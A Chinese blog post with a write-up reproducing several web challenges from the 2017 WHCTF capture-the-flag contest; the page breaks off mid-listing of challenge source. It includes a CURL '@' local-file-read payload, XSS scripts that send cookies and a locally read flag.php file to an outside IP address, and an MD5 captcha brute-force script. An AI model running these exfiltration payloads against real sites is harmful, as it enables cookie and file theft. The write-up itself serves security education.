<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  
  <title>[2017WHCTF] Web详细复现(伪)WP | Pr0ph3t</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="这次Web。。。Orz真的做不出来啊！ 所以大佬们一出的wp就赶紧屁颠屁颠去复现了。。。 复现完写下这些伪wp：(有些题目环境已经挂掉了没办法复现Orz) 本人菜鸡。。。Orz如有说错或者对题目理解错误请各位表哥一定要指正 感激不尽！     Router emmm过了好久才发现漏了一题Orz。。其实这题是最有趣的 可惜了现在找不到啥截图了。。 首先题目提供了一个url和一个附件  首先进去目标网">
<meta name="keywords" content="CyberSecurity,old,writeup">
<meta property="og:type" content="article">
<meta property="og:title" content="[2017WHCTF] Web详细复现(伪)WP">
<meta property="og:url" content="https://blog.pr0ph3t.com/2017/09/19/2017WHCTF-Web详细复现-伪-WP/index.html">
<meta property="og:site_name" content="Pr0ph3t">
<meta property="og:description" content="这次Web。。。Orz真的做不出来啊！ 所以大佬们一出的wp就赶紧屁颠屁颠去复现了。。。 复现完写下这些伪wp：(有些题目环境已经挂掉了没办法复现Orz) 本人菜鸡。。。Orz如有说错或者对题目理解错误请各位表哥一定要指正 感激不尽！     Router emmm过了好久才发现漏了一题Orz。。其实这题是最有趣的 可惜了现在找不到啥截图了。。 首先题目提供了一个url和一个附件  首先进去目标网">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-ccb9f1fe67b92ea4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-e2f1cd728eed4dee.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-5c4686b990733cc4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-a3423f232017db8e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-449dfd0e604dc611.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-469a2a1f4c28a83a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/6949366-04911ca73252d07c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:updated_time" content="2019-07-06T09:54:58.017Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="[2017WHCTF] Web详细复现(伪)WP">
<meta name="twitter:description" content="这次Web。。。Orz真的做不出来啊！ 所以大佬们一出的wp就赶紧屁颠屁颠去复现了。。。 复现完写下这些伪wp：(有些题目环境已经挂掉了没办法复现Orz) 本人菜鸡。。。Orz如有说错或者对题目理解错误请各位表哥一定要指正 感激不尽！     Router emmm过了好久才发现漏了一题Orz。。其实这题是最有趣的 可惜了现在找不到啥截图了。。 首先题目提供了一个url和一个附件  首先进去目标网">
<meta name="twitter:image" content="http://upload-images.jianshu.io/upload_images/6949366-ccb9f1fe67b92ea4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
  
    <link rel="alternative" href="/atom.xml" title="Pr0ph3t" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.png">
  
  
      <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet">
  <script>
      var yiliaConfig = {
          rootUrl: '/',
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            
            <img lazy-src="/img/head.webp" class="js-avatar">
            
        </a>

        <hgroup>
          <h1 class="header-author"><a href="/" title="Hi Mate">Pr0ph3t</a></h1>
        </hgroup>

        
        <p class="header-subtitle">菜菜菜</p>
        
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">博客首页</a></li>
                        
                            <li><a href="/articles">文章</a></li>
                        
                            <li><a href="/about">关于我</a></li>
                        
                            <li><a href="/tags">tags</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl mail" target="_blank" href="mailto://admin@pr0ph3t.com" title="mail">mail</a>
                            
                                <a class="fl github" target="_blank" href="https://github.com/Pr0phet" title="github">github</a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/Attack-Defense/" style="font-size: 12.5px;">Attack&Defense</a> <a href="/tags/CyberSecurity/" style="font-size: 20px;">CyberSecurity</a> <a href="/tags/crypto/" style="font-size: 10px;">crypto</a> <a href="/tags/hitcon/" style="font-size: 15px;">hitcon</a> <a href="/tags/old/" style="font-size: 20px;">old</a> <a href="/tags/writeup/" style="font-size: 17.5px;">writeup</a>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://aluvion.github.io">twings</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://blog.de1ta.club">De1ta</a>
                    
                    </div>
                </section>
                

                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="Me">Pr0ph3t</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/head.webp" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="Me">Pr0ph3t</a></h1>
            </hgroup>
            
            <p class="header-subtitle">菜菜菜</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">博客首页</a></li>
                
                    <li><a href="/articles">文章</a></li>
                
                    <li><a href="/about">关于我</a></li>
                
                    <li><a href="/tags">tags</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="mail" target="_blank" href="mailto://admin@pr0ph3t.com" title="mail">mail</a>
                    
                        <a class="github" target="_blank" href="https://github.com/Pr0phet" title="github">github</a>
                    
                </div>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-2017WHCTF-Web详细复现-伪-WP" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2017/09/19/2017WHCTF-Web详细复现-伪-WP/" class="article-date">
      <time datetime="2017-09-19T11:41:00.000Z" itemprop="datePublished">2017-09-19</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      [2017WHCTF] Web详细复现(伪)WP
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CyberSecurity/">CyberSecurity</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/old/">old</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/writeup/">writeup</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>这次Web。。。Orz真的做不出来啊！<br>所以大佬们一出的wp就赶紧屁颠屁颠去复现了。。。<br>复现完写下这些伪wp：(有些题目环境已经挂掉了没办法复现Orz)<br>本人菜鸡。。。Orz如有说错或者对题目理解错误请各位表哥一定要指正 感激不尽！</p>
<hr>
<h2 id="Router"><a href="#Router" class="headerlink" title="Router"></a>Router</h2><p>emmm过了好久才发现漏了一题Orz。。其实这题是最有趣的 可惜了现在找不到啥截图了。。<br>首先题目提供了一个url和一个附件</p>
<p>首先进去目标网站先扫一下扫到export.php 进去之后下载得到一个settings.conf文件，打开之后没啥用 不知道是啥<br>然后附件 binwalk一下之后出现了一个elf文件，checksec一下</p>
<p><img src="http://upload-images.jianshu.io/upload_images/6949366-ccb9f1fe67b92ea4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="checksec"></p>
<p>扔进gdb跑一下，在大概0x435f4c的位置程序会dump出一个settings.conf文件，然后在大概0x4013c3的位置栈中会出现账号密码</p>
<p><img src="http://upload-images.jianshu.io/upload_images/6949366-e2f1cd728eed4dee.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="username and password"><br>直接拿这个账号密码登上去是登不了的，所以拿我们在export.php下载到的文件替换掉，看看能不能读取到里面的账号密码</p>
<p><img src="http://upload-images.jianshu.io/upload_images/6949366-5c4686b990733cc4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="dump"></p>
<p>结果读到了<br><img src="http://upload-images.jianshu.io/upload_images/6949366-a3423f232017db8e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="pass"></p>
<p>emmm我看其他大佬的wp里面密码是不一样的 估计是被搅屎改掉了 然后我上了之后也改掉了23333<br>之后在里面会有一个带有参数action的ajax交互，把action改成不存在的一个就能得到flag。。。Orz。。。逼死Web狗。。。</p>
<p>再说一个浩子哥哥发现的一个官方后门rce 详情：<a href="https://mp.weixin.qq.com/s/XBBx0rWZu9bAwt62F6Ai8g" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/XBBx0rWZu9bAwt62F6Ai8g</a></p>
<hr>
<h2 id="CAT"><a href="#CAT" class="headerlink" title="CAT"></a>CAT</h2><ul>
<li>一开始以为这道题是常规的命令执行 然后简单的fuzz之后发现过滤了N多个字符，百思不得其解后主办方看不下去了，给了hint是<figure class="highlight plain"><figcaption><span>of PHP CURL```唔。。然后去看了挺久的手册。。发现还是没啥收获，然后思路就变成了用file协议去读文件 然后就跑偏了23333</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">- 正确的思路应该是 将全部字符fuzz一遍 然后发现输入%FF报错，查看报错结果是Python Django，debug没关然后看到关键代码：</span><br><span class="line"></span><br><span class="line">![debug](http://upload-images.jianshu.io/upload_images/6949366-8162eba5a274a820.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line"></span><br><span class="line">这里有疑问就是为什么会有/api/ping的请求呢？</span><br><span class="line">因为我们在题目中并没有这样的url可以访问</span><br><span class="line">并且在ping函数之前是执行了14-21行的代码合并了一个上传的文件(???我们没上传文件呀)</span><br><span class="line">结合之前django报错并不是html渲染后的结果 而是类似于PHP的show_source(特殊符号被转译)和hint 这里就有理由充分猜测后台运行了两个应用，一个是暴露给我们的PHP应用，一个是处理通过PHP发送的请求的Django 这里没有报Invalid Url错误是因为在正则之前有一个转码的过程 Django使用的是GBK编码，而我们发送的%FF并不在其编码表中有意义，(%F7也是)所以就会转码错误，抛出django的exception，不会进入下一步的正则。</span><br><span class="line">而关键部分就是PHP是使用CURL来请求django应用API的，这里触及到了一个知识盲区Orz 就是CURLOPT_POSTFILES</span><br><span class="line">官方文档描述如下：</span><br><span class="line"></span><br><span class="line">![RTFM](http://upload-images.jianshu.io/upload_images/6949366-016bf0921d726cad.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line"></span><br><span class="line">如果在请求前面加上@的话phpcurl组件是会把后面的当作绝对路径请求 结合GBK的特性如果遇到编码不了就会抛出错误的特性   也就是说如果我们去请求一个内容存在GBK不能编码的序列就能通过debug页面把文件内容爆出来,通过debug页面能得到绝对路径</span><br><span class="line">emm然后比较容易想到的就是database.sqlite3文件了</span><br><span class="line">- poc：</span><br><span class="line">![poc](http://upload-images.jianshu.io/upload_images/6949366-878d7f261e059fbf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line"></span><br><span class="line">(flag在右下角)</span><br><span class="line">- payload：?url=@/opt/api/database.sqlite3</span><br><span class="line"></span><br><span class="line">------</span><br><span class="line"></span><br><span class="line">## Emmmm</span><br><span class="line">- 因为题目环境挂了 先挖坑。。以后搭好环境再填</span><br><span class="line">- 大佬们的做法是从phpinfo中获取到开启了xdebug远程调试，然后Vim+DBGP+xdebug进行远程执行代码</span><br><span class="line"></span><br><span class="line">------</span><br><span class="line"></span><br><span class="line">## Not only XSS</span><br><span class="line"></span><br><span class="line">- 简单尝试了一下直接丢js代码发现是可用请求到的</span><br><span class="line">```html</span><br><span class="line">&lt;script&gt;window.location.href=&quot;http://139.199.206.219:2333/&quot;+document.cookie&lt;/script&gt;</span><br></pre></td></tr></table></figure></li>
</ul>
<p><img src="http://upload-images.jianshu.io/upload_images/6949366-449dfd0e604dc611.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="结果"></p>
<p>然后cookie是空的<br>Web服务器是PhantomJS<br>这个服务器有一个特点—PhantomJS是无界面浏览器（headless browser）客户端 支持file协议<br>所以是可以读取静态文件的<br>然后看到Referer很奇怪 是一个静态文件？<br>打开这个静态文件之后发现是我们刚才发送的内容<br>那这里大概能猜到bot是直接打开本地静态文件的<br>然后思路大概就出来了 去读源码<br>但是现在并不知道要读哪里的源码<br>扫一波(自家扫描器 <a href="https://github.com/Pr0phet/ProScanner" target="_blank" rel="noopener">https://github.com/Pr0phet/ProScanner)</a>)<br><img src="http://upload-images.jianshu.io/upload_images/6949366-469a2a1f4c28a83a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="扫描器"></p>
<p>扫出来flag.php 那估计是要读这里的源码了</p>
<ul>
<li><p>payload：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line">var xhr = new XMLHttpRequest();xhr.open("GET", "file:///var/www/html/flag.php", true);xhr.onload = function() &#123;content = btoa(xhr.responseText);window.location.href = "http://139.199.206.219:2333/wtf.php?a=" + content;&#125;;xhr.send(null);</span><br><span class="line"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>poc:</p>
</li>
</ul>
<p><img src="http://upload-images.jianshu.io/upload_images/6949366-04911ca73252d07c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="poc"></p>
<p>base64解码后即为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">$flag=<span class="string">"WHCTF&#123;phant0mjs_c4n_open_f1les_1n_webp4ge&#125;"</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"Flag is here! But nobody can got it!"</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>ps：附上自己写的爆破验证码的脚本，效率还阔以 4位数基本在10秒之内能爆破出来，5位数的话大概也是15秒-20秒左右, 当然。。全靠运气</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf8</span></span><br><span class="line"><span class="comment">#Author: Pr0ph3t</span></span><br><span class="line"><span class="comment"># import requests</span></span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line"><span class="comment">#用法：python 此文件 想要爆破的验证码</span></span><br><span class="line"></span><br><span class="line">url = <span class="string">'http://web.jarvisoj.com:32800/'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># se = requests.Session()</span></span><br><span class="line"><span class="comment"># res = se.get(url)</span></span><br><span class="line"><span class="comment"># code = re.findall('.+substr\(\$verify,0,4\) === \'(.*)\'.+',res.content)[0]</span></span><br><span class="line">preCode = sys.argv[<span class="number">1</span>]</span><br><span class="line">numToCrack = <span class="number">5</span> <span class="comment">#爆破的位数</span></span><br><span class="line"></span><br><span class="line">i = <span class="number">0</span></span><br><span class="line"><span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line">	i += <span class="number">1</span></span><br><span class="line">	<span class="keyword">print</span> <span class="string">'[*] 第'</span> + str(i) + <span class="string">'次碰撞'</span></span><br><span class="line">	testStr = <span class="string">''</span>.join(random.sample(<span class="string">'qwertyuiopasdfghjklzxcvbnm1234567890'</span>,numToCrack)).strip()</span><br><span class="line">	testCode = hashlib.md5(testStr).hexdigest()[<span class="number">0</span>:numToCrack]</span><br><span class="line">	<span class="keyword">if</span> testCode == preCode:</span><br><span class="line">		<span class="keyword">print</span> testStr</span><br><span class="line">		exit()</span><br></pre></td></tr></table></figure>

<p>pss：对题目比较感兴趣所以把源码也读下来了</p>
<ul>
<li><p>index.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">"csp.php"</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">"conn.php"</span>);</span><br><span class="line"></span><br><span class="line">session_start();</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'name'</span>])&amp;&amp;<span class="keyword">isset</span>($_POST[<span class="string">'verify'</span>])&amp;&amp;<span class="keyword">isset</span>($_POST[<span class="string">'phone'</span>])&amp;&amp;<span class="keyword">isset</span>($_POST[<span class="string">'secret'</span>])&amp;&amp;<span class="keyword">isset</span>($_POST[<span class="string">'email'</span>]))&#123;</span><br><span class="line">    $name=Filter($_POST[<span class="string">'name'</span>]);</span><br><span class="line">    $verify=Filter($_POST[<span class="string">'verify'</span>]);</span><br><span class="line">    $phone=Filter($_POST[<span class="string">'phone'</span>]);</span><br><span class="line">    $email=Filter($_POST[<span class="string">'email'</span>]);</span><br><span class="line">    $secret=Filter($_POST[<span class="string">'secret'</span>]);</span><br><span class="line">    <span class="keyword">if</span>($name===<span class="string">""</span>||$verify===<span class="string">""</span>||$phone===<span class="string">""</span>||$secret===<span class="string">""</span>||$email===<span class="string">""</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"Please Complete the form!"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span>(substr(md5($verify),<span class="number">0</span>,<span class="number">5</span>)!==$_SESSION[<span class="string">'md5'</span>])&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"verify error!"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        $id=md5($secret.time().mt_rand(<span class="number">1</span>,<span class="number">100000</span>));</span><br><span class="line">        mysql_query(<span class="string">"insert into $TBNAME values('"</span>.$id.<span class="string">"','"</span>.$name.<span class="string">"','"</span>.$email.<span class="string">"','"</span>.$phone.<span class="string">"','"</span>.$secret.<span class="string">"',false);"</span>);</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"Admin has got your secret and will read it soon."</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">&lt;!DOCTYPE HTML&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;title&gt;Easy XSS game&lt;/title&gt;</span><br><span class="line">&lt;link href=<span class="string">"css/style.css"</span> rel=<span class="string">"stylesheet"</span> type=<span class="string">"text/css"</span> media=<span class="string">"all"</span>/&gt;</span><br><span class="line">&lt;meta http-equiv=<span class="string">"Content-Type"</span> content=<span class="string">"text/html; charset=utf-8"</span> /&gt;</span><br><span class="line">&lt;meta name=<span class="string">"viewport"</span> content=<span class="string">"width=device-width, initial-scale=1, maximum-scale=1"</span>&gt;</span><br><span class="line">&lt;meta http-equiv=<span class="string">"Content-Type"</span> content=<span class="string">"text/html; charset=utf-8"</span> /&gt;</span><br><span class="line">&lt;link href=<span class="string">"css/font-awesome.css"</span> rel=<span class="string">"stylesheet"</span>&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;div class="wthree-dot"&gt;</span><br><span class="line">    &lt;h1&gt;Tell your secret to me&lt;/h1&gt;</span><br><span class="line">    &lt;div class="profile"&gt;</span><br><span class="line">        &lt;div class="wrap"&gt;</span><br><span class="line">            &lt;div class="contact-form"&gt;</span><br><span class="line">                &lt;form action=<span class="string">"#"</span> method=<span class="string">"post"</span>&gt;</span><br><span class="line">                    &lt;div class="w3l-contact-left"&gt;</span><br><span class="line">                        &lt;div class="styled-input agile-styled-input-top"&gt;</span><br><span class="line">                            &lt;input type=<span class="string">"text"</span> name=<span class="string">"name"</span> required=<span class="string">""</span>&gt;</span><br><span class="line">                            &lt;label&gt;Name&lt;/label&gt;</span><br><span class="line">                            &lt;span&gt;&lt;/span&gt;</span><br><span class="line">                        &lt;/div&gt;</span><br><span class="line">                        &lt;div class="styled-input"&gt;</span><br><span class="line">                            &lt;input type=<span class="string">"email"</span> name=<span class="string">"email"</span> required=<span class="string">""</span>&gt;</span><br><span class="line">                            &lt;label&gt;Email&lt;/label&gt;</span><br><span class="line">                            &lt;span&gt;&lt;/span&gt;</span><br><span class="line">                        &lt;/div&gt;</span><br><span class="line">                        &lt;div class="styled-input"&gt;</span><br><span class="line">                            &lt;input type=<span class="string">"text"</span> name=<span class="string">"phone"</span> required=<span class="string">""</span>&gt;</span><br><span class="line">                            &lt;label&gt;Phone&lt;/label&gt;</span><br><span class="line">                            &lt;span&gt;&lt;/span&gt;</span><br><span class="line">                        &lt;/div&gt;</span><br><span class="line">                        &lt;div class="styled-input"&gt;</span><br><span class="line">                            &lt;input type=<span class="string">"text"</span> name=<span class="string">"verify"</span> required=<span class="string">""</span>&gt;</span><br><span class="line">                            &lt;label&gt;verify&lt;/label&gt;</span><br><span class="line">                            &lt;span&gt;&lt;/span&gt;</span><br><span class="line">                        &lt;/div&gt;</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$rand=generate_md5();</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;h2 style='color:#999999'&gt;( PS :substr(md5(\$verify),0,5) === '"</span>.$rand.<span class="string">"' )&lt;/h2&gt;"</span>;</span><br><span class="line">$_SESSION[<span class="string">'md5'</span>]=$rand;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">                    &lt;/div&gt;</span><br><span class="line">                    &lt;div class="w3l-contact-right"&gt;</span><br><span class="line">                        &lt;div class="styled-input agileits-input"&gt;</span><br><span class="line">                            &lt;textarea name=<span class="string">"secret"</span> required=<span class="string">""</span>&gt;&lt;/textarea&gt;</span><br><span class="line">                            &lt;label&gt;Secret&lt;/label&gt;</span><br><span class="line">                            &lt;span&gt;&lt;/span&gt;</span><br><span class="line">                        &lt;/div&gt;</span><br><span class="line">                        &lt;input type=<span class="string">"submit"</span> value=<span class="string">"SEND"</span>&gt;</span><br><span class="line">                    &lt;/div&gt;</span><br><span class="line">                    &lt;div class="clear"&gt; &lt;/div&gt;</span><br><span class="line">                &lt;/form&gt;</span><br><span class="line">            &lt;/div&gt;</span><br><span class="line">        &lt;/div&gt;</span><br><span class="line">    &lt;/div&gt;</span><br><span class="line">&lt;/div&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>csp.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">header(<span class="string">"Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline';style-src 'self' 'unsafe-inline';img-src *;"</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>conn.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span 